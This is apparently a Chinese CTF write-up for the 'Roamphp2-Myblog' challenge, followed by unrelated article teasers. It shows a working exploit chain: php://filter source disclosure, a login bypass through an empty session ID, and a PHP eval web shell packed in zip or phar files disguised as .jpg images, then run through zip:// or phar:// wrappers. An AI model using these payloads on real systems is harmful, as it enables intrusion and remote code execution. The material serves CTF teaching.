[极客大挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFIZIP)||(LFIPhar)【***】

[极客大挑战 2020]Roamphp2-Myblog

  • 1 解题流程
    • 1.1 分析
    • 1.2 解题
    • 1.3 中场休息——再分析
      • 1.3.1 浅层分析
      • 1.3.2 难点疑惑
      • 1.3.3 深度分析
    • 1.4 重整旗鼓——再战
      • 1.4.1 解法一:zip伪协议
      • 1.4.2 解法二:phar伪协议
  • 2 总结展望

1

1 解题流程

1.1 分析

1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。
2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。
3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系

1.2 解题

  1. 首先,我们通过page,看看是否能读取到源码
    ?page=php://filter/read=convert.base64-encode/resource=login
    得到以下关键代码
    <form method="post" action="/?page=admin/user" class="form-validate" id="loginFrom">……</form>
    <?php
    require_once("secret.php");
    mt_srand($secret_seed);
    $_SESSION['password'] = mt_rand();
    ?>
    
    通过代码,我们了解到几个关键信息
    1、登录请求通过post传输到admin/user,我们是否也可以查看该页面源码?
    2、存在secret.php,里面是否有猫腻?
    3、登录密码是随机数,想登录还是放弃吧!
  2. 采用同样的方式读取admin/user源码
    ?page=php://filter/read=convert.base64-encode/resource=admin/user
    获得源码以后,快刀斩乱麻,得到关键代码
    <?php
    session_start();
    $logined = false;
    if (isset($_POST['username']) and isset($_POST['password'])){if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){……
    }
    ?><body class=""><div class="sidebar-wrapper"><ul class="nav"><li ><a href="index.php?page=admin/dashboard"></a></li><li class="active "><a href="index.php?page=admin/user"></a></li><li><a href="index.php?page=admin/tables"></a></li><li class="active-pro"><a href="index.php?page=admin/logout"></a></li></ul></div><?phpif(isset($_FILES['Files']) and $_SESSION['status'] === true){$tmp_file = $_FILES['Files']['name'];$tmp_path = $_FILES['Files']['tmp_name'];if(($extension = pathinfo($tmp_file)['extension']) != ""){$allows = array('gif','jpeg','jpg','png');if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";} else {echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";}}}?>
    </body>
    
    通过代码,我们了解到几个关键信息
    1、第一段的login校验是唬人的,没必要看
    2、html代码中,存在四个page:dashboard、user、tables、logout
    3、存在文件上传代码,且只允许图片格式,对文件名取md5保存在assets/img/upload/目录下

1.3 中场休息——再分析

1.3.1 浅层分析

我们分析到文件上传的部分,算是突破性进展。但是要文件上传首先得到admin页面,但是目前没法登录。
伪造Longlone用户名的cookie登录?不行
思来想去,还是找不到思路……
等等!!!
刚刚读取admin/user源码的时候,我认为第一段的login是唬人的,但其实并不是!
login在校验的过程当中,密码是和什么作比较?和SESSION[‘password’]
而SESSION[‘password’]哪里来?从login的源码我们可以知道,他是通过mt_rand()随机生成的
这说明我们的登录过程当中,一定会存在session值,而且只要把session改成空,就可以成功登录了!

1.3.2 难点疑惑

通过上面的分析,我们知道,session置空就可以登录,但是问题就在于,凭什么置空就能登录?
思考:我把session置1不行吗?置a不行吗?难道不是只要sessoin和password改成一样就好了?
结果:经过尝试,还真不行,依然提示密码错误,那么这就说明,我们传的sessoin实际并不是比较的SESSION[‘password’]
到了这里不研究明白真的没心思做其他事了!!!

1.3.3 深度分析

真相浮出水面,这里贴一张我的思路图
1
这个图,已经把90%的疑惑都解答了,但是还剩10%,那这10%是什么?
思考:我们session传了1,那么文件名是sess_1可以理解。但是我们置空的时候也没有把整个cookie删除,而是PHPSESSID=,按理来讲文件名不应该是sess_吗?如果确实存在sess_这个文件,不还是能找到该文件并且用里面的随机值去校验密码吗?
解答:根据session文件生成特性,如果我们传空或不传,那么就不会生成!

1.4 重整旗鼓——再战

  1. burpsuite抓包,同时修改session,post传递用户名和密码 | 或者直接把密码输入框的require属性删除即可输入空值
    1

1.4.1 解法一:zip伪协议

由于限制图片格式,所以写一句话木马的php文件压缩为zip,同时将zip改为jpg并上传
返回:Update image -> assets/img/upload/d21ff00896ed0acc6e1732d90c69f852e4f55f48.jpg
使用zip伪协议进行解压并执行:格式 - zip:// + 文件路径 + # + 压缩包内部文件名(不带后缀)
  ?page=zip://./assets/img/upload/d21ff00896ed0acc6e1732d90c69f852e4f55f48.jpg#yjh.php ×
  ?page=zip://./assets/img/upload/d21ff00896ed0acc6e1732d90c69f852e4f55f48.jpg%23yjh
  注意get传参要编码,蚁剑连接即可找到flag
  1

1.4.2 解法二:phar伪协议

要知道phar不仅仅可以做反序列化题目,他本质上还是生成一个文件,只有有关文件上传,就可能用到它
所以我们编写phar脚本,生成文件,并将该文件改为jpg后缀上传,再用phar伪协议读取该文件

<?php$phar = new Phar("myblog.phar"); //.phar文件$phar->startBuffering();$phar->setStub('<?php __HALT_COMPILER(); ?>'); //固定的$phar->addFromString("yjh.php", "<?php @eval(\$_POST['pwd']) ?>"); //添加要压缩的文件$phar->stopBuffering();
?>

上传后提示:Update image -> assets/img/upload/aabe33107f7da4b7893e0f3be71e3ec861d1e0a4.jpg
使用phar伪协议进行解压并执行:格式 - phar:// + 文件路径 + / + 压缩包内部文件名(不带后缀)
  ?page=phar://./assets/img/upload/aabe33107f7da4b7893e0f3be71e3ec861d1e0a4.jpg/yjh
  2

2 总结展望

感谢自己!感谢老师!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/153036.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux——指令初识(二)

Linux下基本指令 前言一、时间相关的指令二、Cal指令三、find指令四、grep指令五、sort指令六、uniq指令七、.zip/unzip指令八、.tar指令九、uname –r指令十、重要的几个热键[Tab],[ctrl]-c, [ctrl]-d十一、关机总结 前言 linux的学习开始啦&#xff01; 今天我们继续来认识指…

零基础自学考证HCIE分享,附零基础HCIE学习路线

最近有些粉丝问我&#xff0c;能不能自学华为认证网络工程师HCIE&#xff1f; 我的回答是&#xff1a;能&#xff0c;但是很难。 据不完全统计&#xff0c;考上HCIE的人群中自学占比10%左右。为什么会这么低呢&#xff0c;下面就来给大家说考HCIE自学会遇到的一些困难。 首先&…

Android约束布局ConstraintLayout的Guideline,CardView

Android约束布局ConstraintLayout的Guideline&#xff0c;CardView <?xml version"1.0" encoding"utf-8"?> <androidx.constraintlayout.widget.ConstraintLayout xmlns:android"http://schemas.android.com/apk/res/android"xmlns:a…

【java学习】一维数组(9)

文章目录 1. 一维数组声明2. 一维数组初始化3. 数组元素的引用4. 数组元素的默认初始化 1. 一维数组声明 声明方式&#xff1a; type var[] 或 type[] var 例如&#xff1a; int a[]; int[] a1; double b[]; Mydate[] c; //对象数组2. 一维数组初始化 动态初始化&#xf…

VMware和别的服务器 ,组建局域网那些事 。

利用VMware &#xff0c;实现组件局域网、有可能会受限于WiFi&#xff08;路由器&#xff09; 。 通常不会&#xff0c;除非做了网关设置 相关知识&#xff1a; 禁用局域网隔离&#xff08;LAN Isolation&#xff09;&#xff1a; 某些路由器提供了一个选项&#xff0c;允许您禁…

【面试算法——动态规划 21】不同的子序列(hard) 通配符匹配(hard)

115. 不同的子序列 给你两个字符串 s 和 t &#xff0c;统计并返回在 s 的 子序列 中 t 出现的个数&#xff0c;结果需要对 109 7 取模。 链接&#xff1a;&#xff1a;https://leetcode.cn/problems/distinct-subsequences/ 示例 1&#xff1a; 输入&#xff1a;s “rab…

【微服务】八. 统一网关gateway

8.1 网关作用介绍 网关功能&#xff1a; 身份认证和权限校验服务路由、负载均衡请求限流 网关的技术实现 在SpringCloud中网关的实现包括两种&#xff1a; gatewayzuul Zuul是基于Servlet的实现&#xff0c;属于阻塞式编程。而SpringCloudGateway则是基于Spring5中提供的Web…

“元创新·智生成” 第15届企业数智化学习大会公布嘉宾阵容

2023年是AIGC爆发年&#xff0c;与AI相关的创新应用迅速向各行各业渗透。 在企业培训领域&#xff0c;数字人、元宇宙等正逐渐成为企业在开展人才发展、业务培训等工作的工具&#xff0c;其高效、便捷、在线化、场景化等优势受到企业的热捧。在需求的推动下&#xff0c;企业培…

springboot整合pi支付开发

pi支付流程图&#xff1a; 使用Pi SDK功能发起支付由 Pi SDK 自动调用的回调函数&#xff08;让您的应用服务器知道它需要发出批准 API 请求&#xff09;从您的应用程序服务器到 Pi 服务器的 API 请求以批准付款&#xff08;让 Pi 服务器知道您知道此付款&#xff09;Pi浏览器向…

【Java 进阶篇】CSS语法格式详解

在前端开发中&#xff0c;CSS&#xff08;层叠样式表&#xff09;用于控制网页的样式和布局。了解CSS的语法格式是学习如何设计和美化网页的关键。本文将深入解释CSS的语法格式&#xff0c;包括选择器、属性和值等基本概念&#xff0c;同时提供示例代码以帮助初学者更好地理解。…

微信小程序点单左右联动的效果实现

微信小程序点单左右联动的效果实现 原理解析&#xff1a;   点击左边标签会跳到右边相应位置&#xff1a;点击改变rightCur值&#xff0c;转跳相应位置滑动右边&#xff0c;左边标签会跳到相应的位置&#xff1a;监听并且设置每个右边元素的top和bottom&#xff0c;再判断当…

【Amazon】基于AWS云实例(CentOS 7.9系统)使用kubeadm方式搭建部署Kubernetes集群1.25.4版本

文章目录 前言实验架构介绍K8S集群部署方式说明使用CloudFormation部署EC2实例集群环境准备修改主机名并配置域名解析&#xff08;ALL节点&#xff09;禁用防火墙禁用SELinux加载br_netfilter模块安装ipvs安装 ipset 软件包同步服务器时间关闭swap分区安装Containerd 初始化集群…

Linux: alsa-lib 插件简介

文章目录 1. 前言2. 分析背景3. Linux ALSA 框架4. alsa 声卡设备5. alsa-lib 简介5.1 alsa-lib 插件5.1.1 alsa-lib 插件概览5.1.2 alsa-lib 插件工作细节5.1.2.1 插件对象的创建和初始化5.1.2.2 插件对象处理数据的过程 5.1.3 alsa-lib 内置插件代码组织5.1.4 自定义 alsa-li…

js中的原型链

编写思路&#xff1a; 简单介绍构造函数介绍原型对象原型对象、实例的关系&#xff0c;从而引出原型链的基本概念 原型链基本思想是利用原型让一个引用类型继承另一个引用类型的属性和方法。 1. 什么是构造函数 构造函数本身跟普通函数一样&#xff0c;也不存在定义构造函数…

图神经网络 GNN

之前经常看到图神经网络的内容&#xff0c;但是一直都觉得很难&#xff0c;就没有继续了解&#xff0c;现在抽空学习了一下&#xff0c;简单了解GNN是个什么东西&#xff0c;还没有进行代码实践&#xff0c;随着后续的学习&#xff0c;会继续更新代码的内容&#xff0c;这里先记…

Linux动态链接库.so文件

一、动态库和静态库的区别 库是一个二进制文件&#xff0c;包含的代码可以被程序调用&#xff0c;如标准库、线程库。Windows 和 Linux下的库文件格式不兼容。 Windows环境&#xff1a;静态库是 .lib 文件&#xff0c;共享库是 .dll 文件 Linux环境&#xff1a;静态库是 .a 文…

数据结构与算法(八):排序算法

参考引用 Hello 算法 Github&#xff1a;hello-algo 1. 选择排序 选择排序的工作原理非常直接&#xff1a;开启一个循环&#xff0c;每轮从未排序区间选择最小的元素&#xff0c;将其放到已排序区间的末尾&#xff0c;设数组的长度为 n 初始状态下&#xff0c;所有元素未排序&…

HTTP协议的请求协议和响应协议的组成,HTTP常见的状态信息

HTTP协议 什么是协议 协议实际上是某些人或组织提前制定好的一套规范,大家只要都按照这个规范来就可以做到沟通无障碍 HTTP协议是W3C(万维网联盟组织)制定的一种超文本传输通信协议(发送消息的模板和数据的格式),除了传送字符串,还有声音、视频、图片等流媒体等超文本信息 …

伦敦银最新走势不利怎么办

跟其他的投资品种一样&#xff0c;伦敦银的价格走势在不停的变化&#xff0c;而且由于本身产品具有较高的资金杠杆&#xff0c;所以万一行情走势变得不利&#xff0c;在很短的时间之内就会对投资者的账户造成严重损失&#xff0c;所以投资者应该对此作好充分的准备。 伦敦银的最…

LabVIEW利用以太网开发智能液位检测仪

LabVIEW利用以太网开发智能液位检测仪 目前&#xff0c;工业以太网接口在国内外的发展已经达到了相当深入的程度&#xff0c;特别是在自动化控制和工业控制领域有着非常广泛的应用。在工业生产过程中&#xff0c;钢厂的连铸机是前后的连接环节&#xff0c;其中钢水从大钢包进入…